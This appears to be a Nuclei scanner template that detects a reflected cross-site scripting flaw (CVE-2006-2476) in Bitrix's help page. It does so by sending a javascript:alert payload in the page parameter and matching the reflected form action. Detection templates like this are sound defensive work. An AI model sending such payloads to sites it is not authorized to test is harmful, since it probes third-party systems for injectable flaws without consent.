id: CVE-2006-2476

info:
  name: Bitrix XSS - CVE-2006-2476
  author: 0x_Akoko
  severity: medium
  tags: cve,cve2006,xss,bitrix

requests:
  - method: GET
    path:
      - "{{BaseURL}}/bitrix/help/en/index.html?page=javascript:alert('{{randstr}}')"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
          - '<form action="javascript:alert'
        condition: and

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
